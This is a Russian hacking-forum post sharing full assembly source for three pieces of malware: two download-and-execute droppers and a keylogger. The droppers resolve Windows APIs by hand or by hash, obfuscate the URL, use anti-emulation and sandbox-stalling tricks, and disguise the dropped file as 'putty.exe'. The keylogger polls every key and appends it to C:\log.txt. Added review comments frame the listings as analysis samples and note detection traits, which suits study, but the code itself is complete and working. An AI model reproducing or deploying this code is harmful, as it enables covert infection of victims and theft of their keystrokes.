
Сорцы на asm'e


r00t

Различные сорцы на асме
[MASM] Downloader Small
Код:
.386
.model flat, stdcall
option casemap :none
.data
.code
;-----------------------------------------------------------------------
; NOTE(review): downloader sample, reproduced here for analysis.
; Flow: compute the module's own load delta -> locate kernel32 and
; GetProcAddress by hand (cGetProcAddress, below) -> resolve
; LoadLibraryA, URLDownloadToFileA, ShellExecuteA and ExitProcess by
; name -> download sURL into sFile -> launch sFile -> exit.
; Detection-relevant traits visible in this listing: the .data section
; is empty and there is no includelib, so every API is resolved at run
; time (no import table to inspect); PEB->Ldr walk; manual export table
; parsing; urlmon.dll and shell32.dll loaded dynamically; a relative
; drop path ("putty.exe", resolved against the current directory).
; Register roles: ebp = load delta (run-time address minus link-time
; address), the base of every [ebp+offset x] reference below;
; eax = scratch / API return value.
;-----------------------------------------------------------------------
start:
call delta_jmp                  ; pushes the run-time address of delta_jmp
delta_jmp:
pop eax                         ; eax = run-time address of delta_jmp
mov ebp,eax
sub ebp,offset delta_jmp        ; ebp = run-time - link-time = relocation delta
push ebp                        ; round trip through the stack; popped again at mDat
jmp mDat                        ; skip the inline data that follows
; Inline data, reached only as [ebp+offset name] so it works at any base.
; s* = NUL-terminated strings, x* = addresses filled in at run time.
sGetProcAddress db "GetProcAddress",0
sLoadLibrary db "LoadLibraryA",0
sUrlMon db "urlmon.dll",0
sShell32 db "shell32.dll",0
sURLDownloadToFileA db "URLDownloadToFileA",0
sShellExecuteA db "ShellExecuteA",0
sExitProcess db "ExitProcess",0
sURL db "http://XXX.ru",0
sFile db "putty.exe", 0
xUrlMon dd 0
xShell32 dd 0
xShellExecuteA dd 0
xURLDownloadToFileA dd 0
xExitProcess dd 0
xGetProcAddress dd 0
xLoadLibrary dd 0
xKernelBase dd 0
mDat:
pop ebp
Call cGetProcAddress            ; fills xKernelBase / xGetProcAddress; eax = 0 on failure (not checked here)
;GetProcAddress (LoadLibraryA)
; stdcall: arguments are pushed right to left, i.e. GetProcAddress(xKernelBase, "LoadLibraryA")
lea eax, [ebp+offset sLoadLibrary]
push eax
push [ebp+offset xKernelBase]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xLoadLibrary], eax
;LoadLibrary urlmon
lea eax, [ebp+offset sUrlMon]
push eax
call [ebp + offset xLoadLibrary]
mov [ebp + offset xUrlMon], eax
;LoadLibrary shell32
lea eax, [ebp+offset sShell32]
push eax
call [ebp + offset xLoadLibrary]
mov [ebp + offset xShell32], eax
;GetProcAddress ShellExecute
lea eax, [ebp+offset sShellExecuteA]
push eax
push [ebp+offset xShell32]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xShellExecuteA], eax
;GetProcAddress URLDownloadToFile
lea eax, [ebp+offset sURLDownloadToFileA]
push eax
push [ebp+offset xUrlMon]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xURLDownloadToFileA], eax
;GetProcAddress ExitProcess
lea eax, [ebp+offset sExitProcess]
push eax
push [ebp+offset xKernelBase]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xExitProcess], eax
;Download File
; URLDownloadToFileA(pCaller=0, szURL=sURL, szFileName=sFile, dwReserved=0, lpfnCB=0)
push 0
push 0
lea eax, [ebp+offset sFile]
push eax
lea eax, [ebp+offset sURL]
push eax
push 0
call [ebp + offset xURLDownloadToFileA]
;Execute File
; ShellExecuteA(hwnd=0, lpOperation=0, lpFile=sFile, lpParameters=0, lpDirectory=0, nShowCmd=0 /* SW_HIDE */)
push 0
push 0
push 0
lea eax, [ebp+offset sFile]
push eax
push 0
push 0
call [ebp + offset xShellExecuteA]
;ExitProcess
push 0                          ; exit code
call [ebp + offset xExitProcess]
;-----------------------------------------------------------------------
; cGetProcAddress
; Finds kernel32 through the PEB loader list and resolves GetProcAddress
; by a plain string compare of every export name against
; sGetProcAddress (no hashing).
; In:    ebp = load delta
; Out:   [ebp+xKernelBase]     = DllBase of the module taken as kernel32
;        [ebp+xGetProcAddress] = address of GetProcAddress
;        eax = 0 on failure (bad PE signature or name not found;
;              xGetProcAddress is then left untouched)
; Clobb: eax, ebx, ecx, edx, esi, edi, flags (nothing is preserved)
;-----------------------------------------------------------------------
cGetProcAddress:
assume fs:nothing
mov esi, FS:30h                 ; esi = PEB
mov esi, [esi+ 0Ch]             ; esi = PEB->Ldr
mov esi, [esi+ 1Ch]             ; esi = Ldr->InInitializationOrderModuleList.Flink
next_module:
mov eax, [esi+08h]              ; eax = DllBase (offsets are relative to the init-order link)
mov edi, [esi+20h]              ; edi = BaseDllName.Buffer (UTF-16)
mov esi, [esi]                  ; esi = next entry
cmp BYTE PTR [edi+12*2], al     ; al = low byte of DllBase, 0 for an aligned base:
                                ; is the 13th wide char NUL, i.e. is the name 12 chars long?
jne next_module
cmp BYTE PTR [edi], 6Bh         ; first byte 'k' ...
je find_kernel32_finished
cmp BYTE PTR[edi], 4Bh          ; ... or 'K': accepted as kernel32.dll
je find_kernel32_finished
jmp next_module
find_kernel32_finished:
mov [ebp+offset xKernelBase], eax
lea edi, [ebp+offset sGetProcAddress]   ; edi = name to look for
mov ebx, dword ptr [ eax + 3Ch]         ; e_lfanew
add ebx, eax                            ; ebx = IMAGE_NT_HEADERS
cmp word ptr [ebx], 4550h               ; "PE" signature
jnz    find_error
mov    ebx, [ebx+78h]                   ; export directory RVA (DataDirectory[0])
add    ebx, eax                         ; ebx = IMAGE_EXPORT_DIRECTORY
mov    ecx, [ebx+18h]                   ; NumberOfNames
dec    ecx                              ; ecx = index of the last name; scanned downwards
mov    edx, [ebx+20h]                   ; AddressOfNames RVA
add    edx, eax                         ; edx = name RVA table
find_loop:
mov    esi, [edx+ecx*4]
add    esi, eax                         ; esi = export name string
push    edi                             ; cmp_loop advances edi and clobbers al/bl: keep originals
push    eax
push    ebx
cmp_loop:                               ; strcmp(esi, edi), one byte at a time
mov    al, byte ptr [esi]
mov    bl, byte ptr [edi]
sub    al, bl
jne    cmp_different
add    bl, 0                            ; al == bl here; ZF set when both are the NUL terminator
jz		  cmp_equal
inc    esi
inc    edi
jmp    cmp_loop
cmp_different:
pop    ebx
pop    eax
pop    edi
dec ecx
cmp ecx, 0
jne find_loop
jmp   short find_error
cmp_equal:
pop    ebx
pop    eax
pop    edi                              ; ecx still = matching name index
mov    edx, [ebx+24h]                   ; AddressOfNameOrdinals RVA
add    edx, eax
mov    cx, [edx+ecx*2]                  ; cx = ordinal (writes the low word only; relies on the index being < 10000h)
mov    edx, [ebx+1Ch]                   ; AddressOfFunctions RVA
add    edx, eax
mov    ebx, [edx+ecx*4]                 ; function RVA
add    eax, ebx                         ; eax = address of GetProcAddress
push eax
pop [ebp+offset xGetProcAddress]        ; memory-to-memory store via the stack
ret
find_error:
xor    eax, eax
ret
end start
[MASM] Lr Downloader

Код:
.486
.model flat, stdcall
option casemap :none
.data
; NOTE(review): "Lr Downloader" sample, reproduced for analysis.
; Host is used as the URL argument of the download call but is stored
; with every byte shifted by -14; Crypt (below) adds 14 to each byte in
; place at run time, so the plain URL never appears in the file.
; Save is the drop path (note the trailing space inside the quotes).
; vers is a version tag that is also run through Crypt.
Host db "Zffb,!![_Y$#) [_SYWeZSU] ge![_Y$#)!+')(!eT)TeY b`Y ",0
Save db 'c:\1.png ',0
vers db 'Lr Downloader ',0
.code
include kernelbase.asm          ; GetKernelBase / GetProcAddr / GetLoadLibrary / exit (listed further down)
include szTrim.asm              ; szTrim from masm32.lib (listed further down)
start:
call shit                       ; ~5,000,000-iteration busy loop (presumably a sandbox/emulator stall)
call antiemul                   ; raw SSE opcodes; an emulator without SSE support stops here
push offset Host
call szTrim                     ; strips spaces/tabs from Host (still encoded at this point)
call DownloadAndExecute
call exit                       ; does not return

;-----------------------------------------------------------------------
; DownloadAndExecute
; Builds the DLL names "urlmon.dll" and "shell32.dll" one byte at a time
; on the stack (so neither appears as a literal in the file), then:
;   1. LoadLibraryA("urlmon.dll"), resolve export hash 092C3D419h,
;      decode Host in place (Crypt) and call the export as
;      (0, Host, Save, 0, 0) -- the argument shape of URLDownloadToFileA
;      (the hash itself is not named on the page).
;   2. LoadLibraryA("shell32.dll"), resolve export hash 0318A988Bh and
;      call it as (0, 0, Save, 0, 0, 5) -- the argument shape of
;      ShellExecuteA with nShowCmd = 5 (SW_SHOW).
; Frame: 18h bytes of locals; [ebp-11..ebp-1] = "urlmon.dll",
;        [ebp-23..ebp-12] = "shell32.dll".
; Clobb: eax, ebx, ecx, edx, esi, edi, flags (nothing is preserved
;        for the caller).
;-----------------------------------------------------------------------
DownloadAndExecute:
push ebp
mov ebp, esp
sub esp, 18h
mov byte ptr [ebp-11],'u'       ; "urlmon.dll" at [ebp-11]
mov byte ptr [ebp-10],'r'
mov byte ptr [ebp-9],'l'
mov byte ptr [ebp-8],'m'
mov byte ptr [ebp-7],'o'
mov byte ptr [ebp-6],'n'
mov byte ptr [ebp-5],'.'
mov byte ptr [ebp-4],'d'
mov byte ptr [ebp-3],'l'
mov byte ptr [ebp-2],'l'
mov byte ptr [ebp-1],0
mov byte ptr [ebp-23],'s'       ; "shell32.dll" at [ebp-23]
mov byte ptr [ebp-22],'h'
mov byte ptr [ebp-21],'e'
mov byte ptr [ebp-20],'l'
mov byte ptr [ebp-19],'l'
mov byte ptr [ebp-18],'3'
mov byte ptr [ebp-17],'2'
mov byte ptr [ebp-16],'.'
mov byte ptr [ebp-15],'d'
mov byte ptr [ebp-14],'l'
mov byte ptr [ebp-13],'l'
mov byte ptr [ebp-12],0
push offset vers
call Crypt                      ; shifts the version tag by +14 in place; not referenced again in this listing
call GetLoadLibrary             ; edx = resolved LoadLibraryA (see kernelbase.asm)
lea eax, dword ptr [ebp-11]
push eax
call edx                        ; eax = module handle of urlmon.dll
push 092C3D419h                 ; export name hash
push eax                        ; module base
push 0                          ; unused first argument of GetProcAddr
call GetProcAddr
xchg ebx, eax                   ; ebx = resolved download routine
push offset Host
call Crypt                      ; decode the URL in place
xor edi, edi                    ; edi = 0, reused for every NULL argument below
push edi                        ; lpfnCB
push edi                        ; dwReserved
push offset Save                ; szFileName
push offset Host                ; szURL
push edi                        ; pCaller
call ebx                        ; download Host -> Save

call GetLoadLibrary
lea eax, dword ptr [ebp-23]
push eax
call edx                        ; eax = module handle of shell32.dll
push 0318A988Bh                 ; export name hash
push eax
push 0
call GetProcAddr
xchg ebx, eax                   ; ebx = resolved launch routine
push 5                          ; nShowCmd = SW_SHOW
push edi                        ; lpDirectory
push edi                        ; lpParameters
push offset Save                ; lpFile
push edi                        ; lpOperation
push edi                        ; hwnd
call ebx                        ; run the dropped file
leave
ret
;-----------------------------------------------------------------------
; Crypt proc p:dword
; In-place string "decode": adds 14 to every byte of the zero-terminated
; string at p, stopping at the first NUL (which is left untouched).
; Called once on vers and once on Host by DownloadAndExecute.
; In:    p = address of a writable zero-terminated byte string
; Out:   nothing meaningful (eax = address of the terminator)
; Clobb: eax, flags
;-----------------------------------------------------------------------
Crypt proc p:dword
mov eax, p
jmp @@begin                     ; test-before-add loop: an empty string is left as is
@@:
add byte ptr [eax], 14
inc eax
@@begin:
cmp byte ptr [eax], 0
jnz @b
ret
Crypt endp

;Taken from Win32.Atix
;-----------------------------------------------------------------------
; antiemul
; Executes two SSE instructions emitted as raw bytes (the file is
; assembled under .486, which does not accept the mnemonics):
;   0F 2F C0 = comiss xmm0,xmm0      0F 2A C0 = cvtpi2ps xmm0,mm0
; On real hardware they are harmless; an emulator that does not implement
; SSE presumably faults or stops here. Detection-relevant: db-encoded
; instruction bytes inside the code stream.
; Clobb: flags (eax is saved around the junk xor)
;-----------------------------------------------------------------------
antiemul:
push eax
db 0fh, 02fh, 0c0h; comiss
xor eax,eax ; junk
db 0fh, 02ah, 0c0h;cvtpi2ps
pop eax
retn
;-----------------------------------------------------------------------
; shit
; Busy-wait: 5,000,000 iterations of register shuffling that leaves
; eax = ebx = 0. Presumably a stall to outlast emulators/sandboxes with
; an instruction or time budget. ecx counts down to zero; cmp leaves
; CF = 0 and dec sets ZF when the count is exhausted, which ends the ja.
; Clobb: eax, ebx, ecx, flags
;-----------------------------------------------------------------------
shit:
mov ecx,5000000
_loop:
sub eax, eax                    ; eax = 0
push eax
pop ebx                         ; ebx = 0
xchg eax, ebx                   ; both stay 0
cmp ecx, 0                      ; CF = 0 (unsigned ecx is never below 0)
dec ecx                         ; ZF = 1 once the count reaches 0; CF untouched
ja _loop                        ; ja = CF=0 and ZF=0
retn
end start

kernelbase.asm:
assume fs: nothing
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxx
;-----------------------------------------------------------------------
; GetKernelBase
; Walks PEB->Ldr->InMemoryOrderModuleList and returns the DllBase of the
; entry whose upper-cased BaseDllName (first 24 bytes = 12 UTF-16
; characters) hashes to 6A4ABC5Bh under a ROR13/add hash. The matched
; name is not spelled out on the page; the label says kernel32.
; In:    nothing
; Out:   eax = DllBase of the matching module (returned by overwriting
;              the eax slot that pushad stored at [esp+1Ch])
; Clobb: flags only; every other register is restored by popad
;-----------------------------------------------------------------------
GetKernelBase:
pushad
mov edx,dword ptr fs:[30h] ;get a pointer to the PEB
mov edx,dword ptr [edx+0Ch] ;get PEB->Ldr
mov edx,dword ptr [edx+14h] ;get the first module from the InMemoryOrder module list
next_mod:
mov esi,dword ptr [edx+28h]     ; esi = BaseDllName.Buffer (UTF-16; offsets relative to the InMemoryOrder link)
push 24
pop ecx                         ; ecx = 24 bytes to hash
xor edi,edi                     ; edi = running hash
loop_modname:
xor eax,eax
lodsb                           ; one byte at a time; the UTF-16 high bytes hash in as 0
cmp al,'a' ;some versions of Windows use lower case module names
jl not_lowercase
sub al,20h                      ; fold to upper case
not_lowercase:
ror edi,13
add edi,eax                     ; hash = ror(hash, 13) + byte
loop loop_modname
cmp edi,6A4ABC5Bh               ; expected hash
mov ebx,dword ptr [edx+10h]     ; ebx = DllBase of this entry (mov keeps the flags)
mov edx,dword ptr [edx]         ; edx = next entry
jne next_mod
mov dword ptr [esp+1Ch],ebx     ; patch pushad's saved eax so popad returns ebx in eax
popad
ret
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx
;-----------------------------------------------------------------------
; GetProcAddr
; Export resolver keyed by the CRC-32 of the export name, i.e.
;   DWORD GetProcAddr(DWORD unused, DWORD hModule, DWORD nameCrc32)
; stdcall (retn 0Ch). [ebp+8] is pushed as 0 by every caller on this
; page and never read; [ebp+0Ch] = module base; [ebp+10h] = hash.
; Hash: bitwise CRC-32, reflected polynomial 0EDB88320h (kept as the
; 16-bit halves 0edb8h / 08320h below), initial value -1, final NOT,
; computed over the export name *including* its terminating NUL.
; Out:   eax = VA of the matching export, or 0 when no name matches
; Locals: [ebp-4]   = current name index
;         [ebp-8]   = AddressOfFunctions (VA)
;         [ebp-0Ch] = AddressOfNames (VA)
;         [ebp-10h] = AddressOfNameOrdinals (VA)
;         [ebp-14h] = NumberOfNames
; Clobb: eax, flags; esi, ebx, edi, edx, ecx are pushed/popped
;-----------------------------------------------------------------------
GetProcAddr:
push ebp
mov ebp, esp
add esp, -014h                  ; 14h bytes of locals
push esi
push ebx
push edi
push edx
push ecx
mov eax, dword ptr ss:[ebp+010h]
xor edx, edx
xchg eax, edx                   ; edx = target hash, eax = 0
mov esi, 03ch
add esi, dword ptr ss:[ebp+0ch] ; esi = &e_lfanew
mov eax, dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch] ; eax = IMAGE_NT_HEADERS
mov esi, dword ptr ds:[eax+078h] ; export directory RVA (DataDirectory[0])
add esi, 018h
add esi, dword ptr ss:[ebp+0ch] ; esi = &ExportDir.NumberOfNames
mov eax, dword ptr ds:[esi]
mov dword ptr ss:[ebp-014h], eax ; NumberOfNames
add esi, 4                      ; esi = &AddressOfFunctions
lea edi, dword ptr ss:[ebp-8]
lods dword ptr ds:[esi]         ; AddressOfFunctions RVA
add eax, dword ptr ss:[ebp+0ch]
stos dword ptr es:[edi]         ; [ebp-8] = AddressOfFunctions VA
mov dword ptr ss:[ebp-8], eax   ; (same store again)
lods dword ptr ds:[esi]         ; AddressOfNames RVA
add eax, dword ptr ss:[ebp+0ch]
push eax                        ; kept for esi below
stos dword ptr es:[edi]         ; [ebp-0Ch] = AddressOfNames VA
mov dword ptr ss:[ebp-0ch], eax
mov eax, dword ptr ds:[esi]     ; AddressOfNameOrdinals RVA
add eax, dword ptr ss:[ebp+0ch]
mov dword ptr ss:[ebp-010h], eax ; [ebp-10h] = AddressOfNameOrdinals VA
pop esi                         ; esi = &AddressOfNames[0]
mov dword ptr ss:[ebp-4], 0     ; index = 0
local_2:                        ; for (index = 0; index < NumberOfNames; ++index)
mov eax, dword ptr ss:[ebp-4]
cmp dword ptr ss:[ebp-014h], eax
jnz local_7
xor eax, eax                    ; names exhausted: return 0
pop ecx
pop edx
pop edi
pop ebx
pop esi
leave
retn 0ch
local_7:
push esi                        ; save &AddressOfNames[index]
mov eax, dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch]
xchg eax, edi                   ; edi = export name string
mov ebx, edi
push edi
xor al, al
local_6:                        ; strlen: scan to the NUL; edi ends one past it
scas byte ptr es:[edi]
jnz local_6
pop esi                         ; esi = name string
sub edi, ebx                    ; edi = strlen + 1 (the NUL is hashed too)
push edx                        ; save target hash
cld
xor ecx, ecx
dec ecx                         ; CRC state starts at -1 ...
mov edx, ecx                    ; ... and is held as dx:cx (high:low)
local_3:                        ; per input byte
xor eax, eax
xor ebx, ebx
lods byte ptr ds:[esi]
xor al, cl
mov cl, ch                      ; shift the state dx:cx right by one byte
mov ch, dl
mov dl, dh
mov dh, 8                       ; 8 bit iterations
local_4:
shr bx, 1
rcr ax, 1                       ; bx:ax >>= 1, LSB into CF
jnb local_5
xor ax, 08320h                  ; low half of 0EDB88320h
xor bx, 0edb8h                  ; high half
local_5:
dec dh
jnz local_4
xor ecx, eax
xor edx, ebx
dec edi
jnz local_3
not edx
not ecx                         ; final complement
mov eax, edx
rol eax, 010h
mov ax, cx                      ; eax = CRC assembled from dx:cx
pop edx                         ; target hash back
cmp edx, eax
je local_1
pop esi
add esi, 4                      ; next name
add dword ptr ss:[ebp-4], 1
jmp local_2
local_1:
pop esi
mov eax, dword ptr ss:[ebp-4]
shl eax, 1                      ; index * 2
add eax, dword ptr ss:[ebp-010h]
xor esi, esi
xchg eax, esi                   ; esi = &AddressOfNameOrdinals[index], eax = 0
mov ax, word ptr ds:[esi]       ; ordinal (upper half of eax is 0)
shl ax, 2                       ; ordinal * 4
add eax, dword ptr ss:[ebp-8]
xchg eax, esi                   ; esi = &AddressOfFunctions[ordinal]
mov eax, dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch] ; RVA -> VA
pop ecx
pop edx
pop edi
pop ebx
pop esi
leave
retn 0ch
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxx
;-----------------------------------------------------------------------
; GetLoadLibrary
; Resolves the kernel32 export whose name CRC-32 is 04134d1adh (by the
; label's name, LoadLibraryA; the hash is not decoded on the page).
; Out:   edx = resolved address (eax holds the same value)
; Clobb: eax, edx, flags
;-----------------------------------------------------------------------
GetLoadLibrary:
call GetKernelBase              ; eax = kernel32 base
push 04134d1adh                 ; export name hash
push eax                        ; module base
push 0                          ; unused
call GetProcAddr
mov edx, eax
ret
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
;-----------------------------------------------------------------------
; exit
; Resolves the kernel32 export with name CRC-32 040f57181h and calls it
; with a single 0 argument -- the shape of ExitProcess(0). There is no
; ret after the call: the code relies on the callee never returning.
;-----------------------------------------------------------------------
exit:
call GetKernelBase              ; eax = kernel32 base
push 040f57181h                 ; export name hash
push eax                        ; module base
push 0                          ; unused
call GetProcAddr
push 0                          ; exit code
call eax

;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx
From masm32.lib
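;-----------------------------------------------------------------------
; szTrim  (from masm32.lib)
; DWORD szTrim(char *src)  -- stdcall, trims src in place.
; Removes leading spaces/tabs and everything after the last byte >= 33
; (trailing space, tab and control characters). The result is written
; back over src starting at its first byte.
; In:    src = address of a writable zero-terminated string
; Out:   eax = length of the trimmed string (0 when nothing is left)
;        ecx = src on the normal path; on the empty-result path ecx is 0
; Clobb: eax, ecx, edx, flags (esi/edi are saved and restored)
; Note:  the proc line is "src:DWORD"; the ":D" had been eaten by the
;        forum's emoticon filter in the original post.
;-----------------------------------------------------------------------
szTrim proc src:DWORD
push esi
push edi
mov esi, src                    ; esi = read cursor
mov edi, src                    ; edi = write base (result overwrites src)
xor ecx, ecx                    ; ecx = copy index
sub esi, 1
@@:
add esi, 1
cmp BYTE PTR [esi], 32 ; strip space
je @B
cmp BYTE PTR [esi], 9 ; strip tab
je @B
cmp BYTE PTR [esi], 0 ; test for zero after tabs and spaces
jne @F
xor eax, eax ; set EAX to zero on 0 length result
mov BYTE PTR [edi], 0 ; set string length to zero
jmp tsOut ; and exit
@@:
mov al, [esi+ecx] ; copy bytes from src to dst
mov [edi+ecx], al
add ecx, 1
test al, al
je @F ; exit on zero
cmp al, 33 ; don't store positions lower than 33 (32 + 9)
jb @B
mov edx, ecx ; store count if asc 33 or greater
jmp @B
@@:
mov BYTE PTR [edi+edx], 0       ; terminate right after the last byte >= 33
mov eax, edx ; return trimmed string length
mov ecx, src
tsOut:
pop edi
pop esi
ret
szTrim endp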
[Fasm] Keylogger 1,50 kb

Код:
format PE GUI 5.0
entry start
; NOTE(review): keylogger sample, reproduced for analysis. It polls every
; virtual-key code with GetAsyncKeyState and appends the key's name to
; C:\log.txt (see start/logar below). Observable artifacts: the file
; C:\log.txt and a tight open/append/close cycle on it for every key
; detected. The include path is the author's local FASM install.
include 'C:\fasm\include\win32a.inc'
log db "C:\log.txt",0           ; output path (absolute, hard-coded)
buffer db 0x100 dup (?)         ; 256-byte key-name buffer filled by GetKeyNameTextA
bytes_escritos dd 0             ; "bytes written" (Spanish); WriteFile's lpNumberOfBytesWritten

; Register roles: esi = virtual-key code being polled (8..255),
;                 ebx = log file handle while it is open.
start:
mov esi,7                               ; restart the scan; the first inc makes it 8
invoke Sleep,1                          ; ~1 ms pause per full pass over the key range
jmp gogo
gogo:
cmp esi,255
je start                                ; reached the end of the range: start over
inc esi
invoke GetAsyncKeyState,esi             ; non-zero if key esi is down or was pressed since the last poll
cmp eax,0
jnz logar
jmp gogo
logar:
invoke MapVirtualKey,esi,0              ; 0 = MAPVK_VK_TO_VSC: virtual key -> scan code
shl eax,16                              ; scan code belongs in bits 16..23 of the lParam GetKeyNameText reads
invoke GetKeyNameText,eax,buffer,0x100  ; buffer = human-readable key name

invoke  CreateFile, log, GENERIC_WRITE, 0,  NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL   ; open or create the log
cmp eax,0
je exit                                 ; leaves only when the returned handle is 0
mov ebx,eax
invoke SetFilePointer,ebx,0,0,FILE_END  ; append
invoke lstrlen,buffer
invoke WriteFile,ebx,buffer,eax,bytes_escritos,NULL   ; write the key name (no separator)
invoke Sleep,100
invoke CloseHandle,ebx
jmp gogo                                ; continue polling with the next key code
exit:
invoke ExitProcess,0

; Import table: every API used above is resolved through a normal import
; directory (kernel32 + user32), so this sample is identifiable from its
; imports alone (GetAsyncKeyState + GetKeyNameTextA next to file-write APIs).
data import
library kernel,'KERNEL32.DLL',\
user,'USER32.DLL'
import kernel,\
Sleep,'Sleep',\
CreateFile,'CreateFileA',\
WriteFile,'WriteFile',\
SetFilePointer,'SetFilePointer',\
CloseHandle,'CloseHandle',\
lstrlen,'lstrlenA',\
ExitProcess,'ExitProcess'
import user,\
GetAsyncKeyState, 'GetAsyncKeyState',\
MapVirtualKey,'MapVirtualKeyA',\
GetKeyNameText,'GetKeyNameTextA'
end data
 